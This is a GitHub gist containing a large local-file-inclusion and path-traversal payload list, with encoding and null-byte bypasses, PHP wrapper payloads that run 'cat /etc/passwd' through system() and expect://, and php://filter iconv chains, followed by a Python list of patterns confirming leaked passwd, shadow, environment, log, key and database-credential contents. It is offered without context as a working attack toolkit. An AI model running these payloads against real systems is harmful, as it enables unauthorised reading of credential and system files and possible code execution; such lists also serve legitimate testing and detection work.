Skip to content

Instantly share code, notes, and snippets.

@ratnadip1998

ratnadip1998/Ok

Created January 28, 2026 13:35
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save ratnadip1998/079bafa89a3e80928203720810505750 to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save ratnadip1998/079bafa89a3e80928203720810505750 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
Ok
etc/passwd
/etc/passwd
../etc/passwd
../../etc/passwd
../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../../../../../../../../../etc/passwd
../../../../../../../../../../etc/passwd
../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../etc/passwd
etc/shadow
../etc/shadow
../../etc/shadow
../../../etc/shadow
../../../../etc/shadow
../../../../../etc/shadow
../../../../../../etc/shadow
../../../../../../../etc/shadow
../../../../../../../../etc/shadow
../../../../../../../../../etc/shadow
../../../../../../../../../../etc/shadow
../../../../../../../../../../../etc/shadow
../../../../../../../../../../../../etc/shadow
../../../../../../../../../../../../../etc/shadow
../../../../../../../../../../../../../../etc/shadow
../../../../../../../../../../../../../../../../etc/shadow
....//....//....//etc/passwd
....//....//....//....//etc/passwd
....//....//....//....//....//etc/passwd
..../..../..../etc/passwd
..../..../..../..../etc/passwd
....\....\....\windows\win.ini
....\....\....\....\windows\win.ini
/etc/passwd%00
/etc/passwd%00.jpg
../../../etc/passwd%00
../../../etc/passwd%00.jpg
....//....//....//etc/passwd%00
..%2F..%2F..%2Fetc%2Fpasswd
..%2F..%2F..%2F..%2Fetc%2Fpasswd
..%5c..%5c..%5cwindows%5cwin.ini
..%5c..%5c..%5c..%5cwindows%5cwin.ini
..%c0%af..%c0%af..%c0%afetc/passwd
..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
..%e0%80%af..%e0%80%afetc/passwd
..%e0%80%af..%e0%80%af..%e0%80%afetc/passwd
..%c1%9c..%c1%9cetc/passwd
..%c0%ae..%c0%ae..%c0%ae/etc/passwd
..%252f..%252f..%252fetc%252fpasswd
..%252f..%252f..%252f..%252fetc%252fpasswd
..%255c..%255c..%255cwindows%255cwin.ini
%252e%252e%252f%252e%252e%252fetc%252fpasswd
..%25252f..%25252f..%25252fetc%25252fpasswd
%25252e%25252e%25252f%25252e%25252e%25252fetc%25252fpasswd
../proc/self/environ
../../proc/self/environ
../../../proc/self/environ
../../../../proc/self/environ
../../../../../proc/self/environ
../../../../../../proc/self/environ
../../../../../../../proc/self/environ
../../../../../../../../proc/self/environ
../../../../../../../../../proc/self/environ
../../../../../../../../../../proc/self/environ
../../../../../../../../../../../proc/self/environ
../../../../../../../../../../../../proc/self/environ
../../../../../../../../../../../../../proc/self/environ
../../../../../../../../../../../../../../proc/self/environ
../../../../../../../../../../../../../../../proc/self/environ
../../../../../../../../../../../../../../../../proc/self/environ
../../../../../../../../../../../../../../../../../proc/self/environ
../../../../../../../../../../../../../../../../../../proc/self/environ
proc/self/environ%00
/proc/self/environ%00
../proc/self/environ%00
../../proc/self/environ%00
../../../proc/self/environ%00
../../../../proc/self/environ%00
../../../../../proc/self/environ%00
../../../../../../proc/self/environ%00
../../../../../../../proc/self/environ%00
../../../../../../../../proc/self/environ%00
../../../../../../../../../proc/self/environ%00
../../../../../../../../../../proc/self/environ%00
../../../../../../../../../../../proc/self/environ%00
../../../../../../../../../../../../proc/self/environ%00
../../../../../../../../../../../../../proc/self/environ%00
../../../../../../../../../../../../../../proc/self/environ%00
../../../../../../../../../../../../../../../proc/self/environ%00
../../../../../../../../../../../../../../../../proc/self/environ%00
../../../../../../../../../../../../../../../../../proc/self/environ%00
../../../../../../../../../../../../../../../../../../proc/self/environ%00
../etc/passwd%00
../../etc/passwd%00
../../../../etc/passwd%00
../../../../../etc/passwd%00
../../../../../../etc/passwd%00
../../../../../../../etc/passwd%00
../../../../../../../../etc/passwd%00
../../../../../../../../../etc/passwd%00
../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../etc/passwd%00
../etc/group
../../etc/group
../../../etc/group
../../../../etc/group
../../../../../etc/group
../../../../../../etc/group
../../../../../../../etc/group
../../../../../../../../etc/group
../../../../../../../../../etc/group
../../../../../../../../../../etc/group
../../../../../../../../../../../etc/group
../../../../../../../../../../../../etc/group
../../../../../../../../../../../../../etc/group
../../../../../../../../../../../../../../etc/group
../../../../../../../../../../../../../../../etc/httpd/logs/acces_log%00
../../../../../../../../../../../../../../../etc/httpd/logs/acces.log%00
../../../../../../../../../../../../../../../etc/httpd/logs/error_log%00
../../../../../../../../../../../../../../../etc/httpd/logs/error.log%00
../../../../../../../../../../../../../../../usr/local/apache/logs/access_log%00
../../../../../../../../../../../../../../../usr/local/apache/logs/access.log%00
../../../../../../../../../../../../../../../usr/local/apache/logs/error_log%00
../../../../../../../../../../../../../../../usr/local/apache/logs/error.log%00
../../../../../../../../../../../../../../../usr/lib/security/mkuser.default%00
../../../../../../../../../../../../../../../usr/local/apache2/logs/access_log%00
../../../../../../../../../../../../../../../usr/local/apache2/logs/access.log%00
../../../../../../../../../../../../../../../usr/local/apache2/logs/error_log%00
../../../../../../../../../../../../../../../usr/local/apache2/logs/error.log%00
../../../../../../../../../../../../../../../apache/logs/access.log%00
../../../../../../../../../../../../../../../apache/logs/error.log%00
../../../../../../../../../../../../../../../apache2/logs/error.log%00
../../../../../../../../../../../../../../../apache2/logs/access.log%00
../../../../../../../../../../../../../../../var/www/logs/access_log%00
../../../../../../../../../../../../../../../var/www/logs/access.log%00
../../../../../../../../../../../../../../../var/log/apache/access_log%00
../../../../../../../../../../../../../../../var/log/apache2/access_log%00
../../../../../../../../../../../../../../../var/log/apache/access.log%00
../../../../../../../../../../../../../../../var/log/apache2/access.log%00
../../../../../../../../../../../../../../../var/www/logs/error_log%00
../../../../../../../../../../../../../../../var/www/logs/error.log%00
../../../../../../../../../../../../../../../var/log/access_log%00
../../../../../../../../../../../../../../../var/log/access.log%00
../../../../../../../../../../../../../../../var/log/apache/error_log%00
../../../../../../../../../../../../../../../var/log/apache2/error_log%00
../../../../../../../../../../../../../../../var/log/apache/error.log%00
../../../../../../../../../../../../../../../var/log/apache2/error.log%00
../../../../../../../../../../../../../../../var/log/error_log%00
../../../../../../../../../../../../../../../var/log/error.log%00
../../../../../../../../../../../../../../../var/log/httpd/access_log%00
../../../../../../../../../../../../../../../var/log/httpd/error_log%00
../../../../../../../../../../../../../../../var/log/httpd/access.log%00
../../../../../../../../../../../../../../../var/log/httpd/error.log%00
../../../../../../../../../../../../../../../opt/lampp/logs/access_log%00
../../../../../../../../../../../../../../../opt/lampp/logs/error_log%00
../../../../../../../../../../../../../../../opt/XAMPP/logs/access_log%00
../../../../../../../../../../../../../../../opt/XAMPP/logs/error_log%00
../../../../../../../../../../../../../../../opt/lampp/logs/access.log%00
../../../../../../../../../../../../../../../opt/lampp/logs/error.log%00
../../../../../../../../../../../../../../../opt/XAMPP/logs/access.log%00
../../../../../../../../../../../../../../../opt/XAMPP/logs/error.log%00
../../../../../../../../../../../../../../../etc/httpd/logs/acces_log
../../../../../../../../../../../../../../../etc/httpd/logs/acces.log
../../../../../../../../../../../../../../../etc/httpd/logs/error_log
../../../../../../../../../../../../../../../etc/httpd/logs/error.log
../../../../../../../../../../../../../../../usr/local/apache/logs/access_log
../../../../../../../../../../../../../../../usr/local/apache/logs/access.log
../../../../../../../../../../../../../../../usr/local/apache/logs/error_log
../../../../../../../../../../../../../../../usr/local/apache/logs/error.log
../../../../../../../../../../../../../../../usr/lib/security/mkuser.default
../../../../../../../../../../../../../../../usr/local/apache2/logs/access_log
../../../../../../../../../../../../../../../usr/local/apache2/logs/access.log
../../../../../../../../../../../../../../../usr/local/apache2/logs/error_log
../../../../../../../../../../../../../../../usr/local/apache2/logs/error.log
../../../../../../../../../../../../../../../apache/logs/access.log
../../../../../../../../../../../../../../../apache/logs/error.log
../../../../../../../../../../../../../../../apache2/logs/error.log
../../../../../../../../../../../../../../../apache2/logs/access.log
../../../../../../../../../../../../../../../var/www/logs/access_log
../../../../../../../../../../../../../../../var/www/logs/access.log
../../../../../../../../../../../../../../../var/log/apache/access_log
../../../../../../../../../../../../../../../var/log/apache2/access_log
../../../../../../../../../../../../../../../var/log/apache/access.log
../../../../../../../../../../../../../../../var/log/apache2/access.log
../../../../../../../../../../../../../../../var/www/logs/error_log
../../../../../../../../../../../../../../../var/www/logs/error.log
../../../../../../../../../../../../../../../var/log/access_log
../../../../../../../../../../../../../../../var/log/access.log
../../../../../../../../../../../../../../../var/log/apache/error_log
../../../../../../../../../../../../../../../var/log/apache2/error_log
../../../../../../../../../../../../../../../var/log/apache/error.log
../../../../../../../../../../../../../../../var/log/apache2/error.log
../../../../../../../../../../../../../../../var/log/error_log
../../../../../../../../../../../../../../../var/log/error.log
../../../../../../../../../../../../../../../var/log/httpd/access_log
../../../../../../../../../../../../../../../var/log/httpd/error_log
../../../../../../../../../../../../../../../var/log/httpd/access.log
../../../../../../../../../../../../../../../var/log/httpd/error.log
../../../../../../../../../../../../../../../opt/lampp/logs/access_log
../../../../../../../../../../../../../../../opt/lampp/logs/error_log
../../../../../../../../../../../../../../../opt/XAMPP/logs/access_log
../../../../../../../../../../../../../../../opt/XAMPP/logs/error_log
../../../../../../../../../../../../../../../opt/lampp/logs/access.log
../../../../../../../../../../../../../../../opt/lampp/logs/error.log
../../../../../../../../../../../../../../../opt/XAMPP/logs/access.log
../../../../../../../../../../../../../../../opt/XAMPP/logs/error.log
/var/log/httpd-access.log
../var/log/httpd-access.log
../../var/log/httpd-access.log
../../../var/log/httpd-access.log
../../../../var/log/httpd-access.log
../../../../../var/log/httpd-access.log
../../../../../../var/log/httpd-access.log
../../../../../../../var/log/httpd-access.log
../../../../../../../../var/log/httpd-access.log
../../../../../../../../../var/log/httpd-access.log
../../../../../../../../../../var/log/httpd-access.log
../../../../../../../../../../../var/log/httpd-access.log
../../../../../../../../../../../../var/log/httpd-access.log
../../../../../../../../../../../../../var/log/httpd-access.log
../../../../../../../../../../../../../../var/log/httpd-access.log
../../../../../../../../../../../../../../../var/log/httpd-access.log
../../../../../../../../../../../../../../../../var/log/httpd-access.log
../../../../../../../../../../../../../../../../../var/log/httpd-access.log
/var/log/httpd-access.log%00
../var/log/httpd-access.log%00
../../var/log/httpd-access.log%00
../../../var/log/httpd-access.log%00
../../../../var/log/httpd-access.log%00
../../../../../var/log/httpd-access.log%00
../../../../../../var/log/httpd-access.log%00
../../../../../../../var/log/httpd-access.log%00
../../../../../../../../var/log/httpd-access.log%00
../../../../../../../../../var/log/httpd-access.log%00
../../../../../../../../../../var/log/httpd-access.log%00
../../../../../../../../../../../var/log/httpd-access.log%00
../../../../../../../../../../../../var/log/httpd-access.log%00
../../../../../../../../../../../../../var/log/httpd-access.log%00
../../../../../../../../../../../../../../var/log/httpd-access.log%00
../../../../../../../../../../../../../../../var/log/httpd-access.log%00
../../../../../../../../../../../../../../../../var/log/httpd-access.log%00
../../../../../../../../../../../../../../../../../var/log/httpd-access.log%00
proc/self/environ
/proc/self/environ
/proc/self/cmdline
/proc/self/stat
/proc/self/status
../logs/access_log
../logs/error_log
/var/cpanel/cpanel.config/apache/logs/access.log
/apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/access.log
../../../../apache/logs/access.log
/Program Files\Apache Group\Apache\logs\access.log
/Program Files\Apache Group\Apache\logs\error.log
C:\boot.ini
C:/boot.ini
C:\WAMP\logs\access.log
C:/XAMPP/logs/access.log
C:/WAMP/logs/access.log
C:\XAMPP\logs\access.log
D:\boot.ini
D:/boot.ini
D:\WAMP\logs\access.log
D:/XAMPP/logs/access.log
D:/WAMP/logs/access.log
D:\XAMPP\logs\access.log
web.config
..../..../..../..../..../etc/passwd
.././.././.././etc/passwd
.././.././.././.././etc/passwd
.\.\.\.\.\.windows\win.ini
.\.\.\.\.\.\.windows\win.ini
/./etc/./passwd
/././etc/././passwd
/./././etc/./././passwd
...//...//.../etc/passwd
...///...///...///etc/passwd
..//..//..//etc/passwd
..\\..\\..\\windows\\win.ini
..\\\\..\\\\..\\\\windows\\\\win.ini
..%5c%5c..%5c%5c..%5c%5cwindows%5c%5cwin.ini
..\/..\/..\/etc/passwd
..\/..\/..\/../etc/passwd
../\../\../\etc/passwd
/etc/passwd%00.php
/etc/passwd%00.txt
../../../etc/passwd%00.php
/etc/passwd%2500
/etc/passwd%2500.jpg
../../../etc/passwd%2500
/etc/passwd%00%00
../../../etc/passwd%00%00.jpg
/etc/passwd\x00
../../../etc/passwd\x00.jpg
/etc/passwd%u0000
../../../etc/passwd%u0000.jpg
..\..\..\..\WiNdOwS\wIn.InI
../../../ETC/PASSWD
../../../Etc/Passwd
..%u2216..%u2216etc%u2216passwd
..%u2215..%u2215etc%u2215passwd
..%uFF0F..%uFF0F..%uFF0Fetc%uFF0Fpasswd
../|../|../|etc/passwd
..;<..;<..;<etc/passwd
..%2f..%2f..%2fetc%2fpasswd
..%5C..%5C..%5Cwindows%5Cwin.ini
..%2f..%2F../etc/passwd
..%5c..%5C..\windows\win.ini
..%2f../..%2fetc/passwd
/e/**/tc/p/**/asswd
/e<!-- -->tc/p<!-- -->asswd
/e<>tc/p<>asswd
/etc/ passwd
/etc/ passwd
/ etc / passwd
../../../ etc/ passwd
/etc/ passwd
../../../ etc/ passwd
/etc/%0apasswd
../../../etc/%0apasswd
/etc/%0dpasswd
../../../etc/%0dpasswd
%c0%aeetc%c0%afpasswd
%c0%ae%c0%ae/etc/passwd
%u002e%u002e%u002fetc%u002fpasswd
%u002e%u002e%u005cwindows%u005cwin.ini
file:///etc/passwd
file://C:/windows/win.ini
expect://cat /etc/passwd
expect://cat%20/etc/passwd
ogg:///etc/passwd
data://text/plain,<?php system('cat /etc/passwd'); ?>
data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgL2V0Yy9wYXNzd2QnKTsgPz4=
php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
php://filter/read=string.rot13/resource=/etc/passwd
compress.zlib://../../../../../../etc/passwd
compress.zlib://php://filter/convert.base64-encode/resource=/etc/passwd
compress.bzip2://../../../../../../etc/passwd
compress.bzip2://php://filter/convert.base64-encode/resource=/etc/passwd
php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.ISO6937.8859_4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=index.php
php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=index.php
php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=/etc/passwd
# ==========================================================
# LFI / Path Traversal detection patterns
# ==========================================================
LFI_CONFIRMED_PATTERNS = [
r"root:x:0:0:", # /etc/passwd
r"daemon:x:\d+:\d+:", # /etc/passwd
r"/bin/(bash|sh)",
r"bin:x:2:2:",
r"sys:x:3:3:",
r"nobody:x:65534:65534:",
r"\/sbin\/nologin",
r"<\?php", # base64 of <?php
r"phpinfo\(\)",
r"PD9waHA=",
r"echo.*\$",
r"DB_HOST", $Config
r"DB_NAME",
r"DB_USER",
r"DB_PASSWORD",
r"SECRET_KEY",
r"API_KEY",
r"root:$", # /etc/shadow content
r"bin:$", # /etc/shadow content
r"127.0.0.1", # /etc/hosts content
r"localhost", # /etc/hosts content
r"/home/[^:]+:", # home dirs in passwd
r"nobody:x:\d+:\d+",
r"syslog:x:\d+:\d+",
r"Linux version", # /proc/version content
r"gcc version", # /proc/version content
r"failed to open stream", #PHP errors
r"No such file or directory",
r"File not found",
r"Warning: include",
r"Warning: require",
r"Warning: fopen", #PHP errors
r"DocumentRoot", #Configuration file indicators
r"ServerRoot",
r"<?php",
r"define('",
r"$db_host",
r"$db_user", #Configuration file indicators
r"BEGIN RSA PRIVATE KEY", #SSH
r"BEGIN OPENSSH PRIVATE KEY",
r"ssh-rsa",
r"GET \/", #Log
r"POST \/",
r"HTTP\/1\.[01]",
r"\[error\]",
r"\[warn\]",
r"\[notice\]",
r"\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}", #Log
r"APP_ENV=", #ENV
r"DB_",
r"REDIS_",
r"AWS_",
r"API_",
r"SECRET_",
r"KEY=", #ENV
r"\[files\]",
r"\[Mail\]",
r"PD9waHA", #base64
r"/usr/sbin/nologin",
r"\[fonts\]", # win.ini
r"\[extensions\]", # win.ini
r"for 16-bit app support", # win.ini
r"\[drivers\]",
r"\[mci extensions\]",
r"Windows Registry Editor",
r"C:\\Windows\\System32",
r"java\.version",
r"java\.home",
r"java\.class\.path",
r"sun\.boot\.library\.path",
r"org\.apache\.catalina",
r"CATALINA_HOME",
r"CATALINA_BASE",
r"allow_url_include",
r"disable_functions",
r"open_basedir",
r"upload_tmp_dir",
r"DOCUMENT_ROOT",
r"php_version",
r"GET / HTTP/1\.[01]",
r"POST / HTTP/1\.[01]",
r"User-Agent:",
r"Referer:",
r"\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}", # IP address
r"<web-app", # web.xml
r"WEB-INF",
r"META-INF",
r"HTTP_USER_AGENT=", # /proc/self/environ
r"HTTP_ACCEPT=",
]
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment